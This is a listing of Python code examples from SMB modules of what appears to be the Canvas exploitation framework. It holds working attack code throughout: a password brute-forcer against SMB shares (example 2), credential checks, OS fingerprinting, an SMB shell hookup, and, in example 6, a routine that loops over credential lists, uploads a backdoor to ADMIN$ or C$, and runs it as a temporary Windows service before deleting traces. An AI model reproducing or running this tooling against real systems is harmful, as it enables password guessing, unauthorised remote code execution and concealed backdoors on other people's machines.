示例#1
    def test(self):
        """
        Check that the configured credentials can reach the target share.

        Opens an SMB session to ``self.host``:``self.port`` with the
        domain/user/password taken from the module arguments, attempts a
        tree connect to ``self.filename`` and closes the session again.
        Returns 1 when both the session and the tree connect succeed,
        0 otherwise. Progress goes through ``self.log``/``self.setInfo``;
        note that the password is written to the log in clear text.
        """
        self.getargs()
        banner = (NAME, self.host, self.port, self.covertness)
        self.setInfo("%s attacking %s:%d (Covertness:%d) - running" % banner)

        self.log("Using domain=%s user=%s, password %s" %
                 (self.domain, self.user, self.password))
        session = msrpc.SMB(self.host, port=self.port, getsock=self)
        # Session parameters mirror the module arguments one-to-one.
        for attr, value in (("covertness", self.covertness),
                            ("username", self.user),
                            ("password", self.password),
                            ("domain", self.domain)):
            setattr(session, attr, value)

        if not session.connect():
            self.log("Could not connect to remote host: %s" % session.errormsg)
            return 0

        self.log("Trying treeconnect_AndX on share %s" % self.filename)
        if not session.treeconnect(self.filename):
            self.log("Failed to connect to share!")
            return 0

        self.log("Connected to share %s" % self.filename)
        session.close()
        return 1
示例#2
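 def run(self):
     """
     Try each candidate password in the word list against the target share.

     Candidates come from ``self.filename``, one per line, preceded by the
     empty password and the username itself. For each candidate an SMB
     session is opened as ``self.user`` and a tree connect to ``self.share``
     is attempted; the first candidate that gets onto the share ends the
     run with 1. Returns 0 when the word list cannot be read, when the
     module is halted, or when every candidate fails. Progress and the
     outcome are reported through ``self.log``/``self.setInfo``.

     Note: every attempted user/password pair is written to the module log.

     NOTE(review): ``self.port`` is formatted with %s in the "running"
     messages but with %d in the "done" messages -- the latter raise if the
     port is held as a string.
     """
     self.getArgs()
     self.log('%s running against %s:%s covertness: %d' %
              (NAME, self.host, self.port, self.covertness))
     self.setInfo('%s attacking %s:%s (Covertness:%d) - running' %
                  (NAME, self.host, self.port, self.covertness))
     #self.log('Using user=%s, password=%s'%(self.user,self.password))
     # Read the word list under a context manager so the handle is released
     # even if readlines() fails (``open`` replaces the Python-2-only ``file``
     # builtin). Catch only I/O errors rather than the original bare
     # ``except:``, which also swallowed KeyboardInterrupt/SystemExit.
     try:
         with open(self.filename) as wordlist:
             passwords = wordlist.readlines()
     except (IOError, OSError):
         self.log('Failed to open password file %s' % (self.filename))
         return 0
     # Tried before the word list: blank password, then the username itself.
     passwords.insert(0, self.user)
     passwords.insert(0, '')
     for password in passwords:
         # Honour a requested halt between attempts.
         if self.state == self.HALT:
             self.log('Halted')
             return 0
         password = password.strip()
         # A fresh session per candidate; no port is passed, so msrpc.SMB's
         # default applies. The object is dropped without an explicit
         # close(), as in the original.
         smbobj = msrpc.SMB(self.host, getsock=self)
         smbobj.covertness = self.covertness
         smbobj.username = self.user
         smbobj.password = password
         ret = smbobj.connect()
         if not ret:
             self.log('Could not connect to remote host as "%s":"%s"' %
                      (self.user, password))
             continue
         self.log('Trying TreeConnect_AndX on share %s' % self.share)
         ret = smbobj.treeconnect(self.share)
         if not ret:
             self.log('Failed to connect to share as "%s":"%s"!' %
                      (self.user, password))
             continue
         # Success: report the working pair in the status line and stop.
         self.log('Connected to share %s with "%s":"%s"' %
                  (self.share, self.user, password))
         self.log('Done with exploit')
         self.setInfo(
             '%s attacking %s:%d (Covertness:%d) - done (found:%s:%s)' %
             (NAME, self.host, self.port, self.covertness, self.user,
              password))
         return 1
     self.setInfo('%s attacking %s:%d (Covertness:%d) - done (failed)' %
                  (NAME, self.host, self.port, self.covertness))
     return 0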
示例#3
 def test(self):
     """
     Verify that ``self.user``/``self.password`` can reach ``self.share``.

     Opens an SMB session to ``self.host`` (no port is passed, so
     ``msrpc.SMB``'s default applies), attempts a tree connect to the
     share and closes the session. Returns 1 if the share was reachable,
     0 if either the session or the tree connect failed. Status is
     reported through ``self.log``/``self.setInfo``.
     """
     self.getArgs()
     status = (NAME, self.host, self.port, self.covertness)
     self.log('%s running against %s:%s covertness: %d' % status)
     self.setInfo('%s attacking %s:%s (Covertness:%d) - running' % status)
     #self.log('Using user=%s, password=%s'%(self.user,self.password))
     session = msrpc.SMB(self.host, getsock=self)
     session.covertness = self.covertness
     session.username = self.user
     session.password = self.password
     if not session.connect():
         self.log('Could not connect to remote host')
         return 0
     self.log('Trying treeconnect_AndX on share %s' % (self.share))
     if not session.treeconnect(self.share):
         self.log('Failed to connect to share!')
         return 0
     self.log('Connected to share %s' % (self.share))
     session.close()
     return 1
示例#4
文件: smb.py 项目: tsondt/Canvas
    def do_smb(self):
        """
        Fingerprint the target OS from its SMB negotiation strings.

        Tries ports 139 and 445 in turn. The first session whose LAN Manager
        string is not 'unknown' has its lanman, domain and server strings
        recorded on ``self.target`` and ends the probing. The native OS
        string of the last session tried is then mapped to a ``canvasos``
        object. Returns that object, or None when the OS string matched
        none of the known patterns (including UNIX hosts that are not SuSE).

        NOTE(review): the return value of ``smbobj.connect()`` is never
        checked, so ``smbobj.os`` / ``smbobj.lanman`` are read even after a
        failed connection -- confirm msrpc.SMB gives them safe defaults.
        """

        result = None

        self.log("SMB DETECT: Doing SMB OS Detection")
        #set default port here
        for port in [139, 445]:
            smbobj = msrpc.SMB(self.host, port=port, getsock=self)
            smbobj.covertness = self.covertness
            smbobj.username = self.user
            smbobj.password = self.password

            # Return value unused: the OS string is logged whatever
            # connect() reported.
            ret = smbobj.connect()

            self.log('SMB DETECT: SMB OS Detection (port=%d) returned %s' %
                     (port, smbobj.os))

            # A LAN Manager string other than 'unknown' is taken as "this
            # port answered": record the identity strings and stop probing.
            if smbobj.lanman.lower() != 'unknown':

                self.log("SMB DETECT: Adding lanman knowledge: %s" %
                         smbobj.lanman)
                # third argument (100) passed through to add_knowledge --
                # presumably a confidence value; verify against the API
                self.target.add_knowledge("Lanman", smbobj.lanman, 100)

                self.log("SMB DETECT: Adding domain knowledge: %s" %
                         smbobj.domain)
                self.target.add_knowledge("SMBDomain", smbobj.domain, 100)

                self.log("SMB DETECT: Adding server knowledge: %s" %
                         smbobj.server)
                self.target.add_knowledge("SMBServer", smbobj.server, 100)
                break

        # check native OS, assume Linux for SAMBA
        # ``smbobj`` is whichever session the loop stopped on: the port that
        # answered, or the port-445 session if neither did.

        if 'UNIX' in smbobj.os.upper():

            #When you assume...
            #if 'SAMBA' in smbobj.lanman.upper():
            #    self.log("SMB DETECT: found Unix SAMBA, assuming Linux OS")
            #    result = canvasos.new("Linux")

            # Only SuSE is classified; any other UNIX leaves result as None.
            if 'SUSE' in smbobj.lanman.upper():
                result = canvasos.new("Linux")
                result.version = "SuSE"

        # Windows SMB muck

        elif 'VISTA' in smbobj.os.upper():
            result = canvasos.new('Windows')
            result.version = 'Vista'
            # family is set only when an edition substring is present
            for subversion in ['Ultimate']:
                if smbobj.os.find(subversion) != -1:
                    result.family = subversion

        elif 'LAN MANAGER 4.0' in smbobj.os.upper():
            result = canvasos.new('Windows')
            result.version = 'NT 4.0'

        elif 'WINDOWS' in smbobj.os.upper():
            result = canvasos.new('Windows')

            # Ordered, case-sensitive substring checks on the raw OS string;
            # the first match wins, so 'Windows NT 4.0' must precede
            # 'Windows 4.0'. No match leaves result.version unset.
            if smbobj.os.find('Windows 5.0') != -1:
                result.version = '2000'

            elif smbobj.os.find('Windows 5.1') != -1:
                result.version = 'XP'

            elif smbobj.os.find('Windows .NET 5.2') != -1:
                result.version = '.NET RC2'

            elif smbobj.os.find('Windows NT 4.0') != -1:
                result.version = 'NT'

            elif smbobj.os.find('Windows 4.0') != -1:
                result.version = '9x'

            elif smbobj.os.find('Windows Server 2003') != -1:
                result.version = '2003'
                # SP0 is recorded when no service-pack string is present
                if smbobj.os.find('Service Pack 1') != -1:
                    result.servicepack.append('SP1')
                elif smbobj.os.find('Service Pack 2') != -1:
                    result.servicepack.append('SP2')
                else:
                    result.servicepack.append('SP0')

        return result
示例#5
    def run(self):
        """
        Connect to the target share and attach an SMB VFS shell to a new node.

        Flow:
          1. Open an SMB session as domain/user/password on ``self.port``;
             if that fails and the port is not 445, retry once on 445.
          2. Tree-connect to ``self.filename`` (the share); if that fails
             and the session is not on 445, reconnect on 445 and try again.
          3. Probe the share root (a single backslash) with
             ``checkdirectory`` -- the outcome is only logged -- then create
             a VFSNode whose parent is the first passed node and hand it to
             ``smbshell`` together with the live session.

        Returns the new VFSNode (also stored in ``self.result``) on success,
        or 0 when neither the session nor the tree connect could be
        established. ``self.result`` is reset to [] on entry and stays
        empty on failure. The password is written to the log in clear text.
        """
        self.result = []
        self.getargs()

        self.log("%s running against %s:%d covertness: %d" %\
                (NAME,self.host,self.port,self.covertness))
        self.setInfo("%s attacking %s:%d (Covertness:%d) - running" %\
                (NAME,self.host,self.port,self.covertness))
        self.log("Using domain=%s user=%s, password %s" %\
                (self.domain,self.user,self.password))

        smbobj = msrpc.SMB(self.host, port=self.port, getsock=self)
        smbobj.covertness = self.covertness
        smbobj.username = self.user
        smbobj.password = self.password
        smbobj.domain = self.domain

        ret = smbobj.connect()

        if not ret:
            self.log("Could not connect to remote host: %s" % smbobj.errormsg)

            # Port-445 fallback: only attempted when the configured port
            # differs from 445; the same session object is reused.
            if self.port != 445:

                smbobj.port = 445
                self.log("Attempting to try port 445.")
                ret = smbobj.connect()

                if not ret:
                    return 0
            else:
                return 0

        # smbobj.port (not self.port) is reported: it may now be 445.
        self.log("Successfully connected to %s:%d" % (self.host, smbobj.port))
        self.log("Trying treeconnect_AndX on share %s" % self.filename)
        ret = smbobj.treeconnect(self.filename)

        if not ret:

            # Try again with port 445
            # Same fallback for the tree connect: reconnect on 445 and retry.
            if smbobj.port != 445:

                smbobj.port = 445
                ret = smbobj.connect()

                # NOTE(review): unlike the other failure paths this one
                # returns without logging why the reconnect failed.
                if not ret:
                    return 0
                else:

                    ret = smbobj.treeconnect(self.filename)

                    if not ret:
                        self.log("Failed to connect to share!")
                        return 0

            else:
                self.log("Failed to connect to share!")
                return 0

        self.log("Connected to share %s" % self.filename)

        # The directory probe does not affect control flow; both outcomes
        # fall through to shell creation.
        if not smbobj.checkdirectory("\\"):
            self.log("Can't check directory on that share. :<")
        else:
            self.log("Checkdirectory \\ passed...")

        node = VFSNode()
        node.parentnode = self.argsDict["passednodes"][0]
        # ``newshell`` is not referenced again; presumably the smbshell
        # constructor registers itself on ``node`` -- verify.
        newshell = smbshell(smbobj, node, self.logfunction)

        self.setInfo("%s attacking %s:%d (Covertness:%d) - done" %\
                    (NAME,self.host,self.port,self.covertness))
        self.result = [node]
        return node
示例#6
    def run(self):
        self.getargs()
        self.maketrojan()

        self.log('[D2] %s running against %s:%d covertness: %d' %
                 (NAME, self.host, self.port, self.covertness))
        self.setInfo('[D2] %s attacking %s:%d (Covertness:%d) - running' %
                     (NAME, self.host, self.port, self.covertness))

        listaccount = {}
        if self.msrpcuser and self.msrpcpassword:
            listaccount[self.msrpcuser] = self.msrpcpassword
        if self.credentfile:
            lines = open(self.credentfile, 'r').readlines()
            for line in lines:
                user, passwd = line[:-1].split(':')
                listaccount[user] = passwd

        for user, passwd in listaccount.items():
            self.msrpcuser = user
            self.msrpcpassword = passwd
            self.smbobj = msrpc.SMB(self.host, port=self.port, getsock=self)
            self.smbobj.covertness = self.covertness
            self.smbobj.username = self.msrpcuser
            self.smbobj.password = self.msrpcpassword
            self.smbobj.domain = self.domain
            ret = self.smbobj.connect()
            if not ret:
                continue
            self.log('[D2] Using domain=%s user=%s, password=%s' %
                     (self.domain, self.msrpcuser, self.msrpcpassword))
            sharelist = ["ADMIN$", "C$", "D$", "E$"]
            shareenum = self.run_module('shareenum')
            for share in shareenum:
                name, desc = str(share).split(':')
                if name not in sharelist:
                    sharelist.append(name)
            self.log('[D2] Trying to log into %s file share' %
                     (', '.join(sharelist)))
            for sharename in sharelist:
                if not self.connect_to_share(sharename): continue
                if not self.upload_backdoor(): continue
                scm = self.create_service(sharename)
                if scm == None:
                    continue
                handler = self.open_service(scm)
                if handler == None:
                    continue
                self.start_service(handler)
                time.sleep(10)
                self.stop_service(handler)
                self.delete_service(handler)
                self.CloseServiceHandle(handler)
                self.CloseServiceHandle(scm)
                time.sleep(10)
                os.unlink(self.srcbin)
                self.delete_backdoor()
                time.sleep(10)
                self.myDCE.close()
                self.smbobj.s.close()
                self.log('[D2] Done with exploit')
                self.setInfo('[D2] %s attacking %s:%d (Covertness:%d) - done' %
                             (NAME, self.host, self.port, self.covertness))
                return 1
        self.setInfo('[D2] %s attacking %s:%d (Covertness:%d) - failed' %
                     (NAME, self.host, self.port, self.covertness))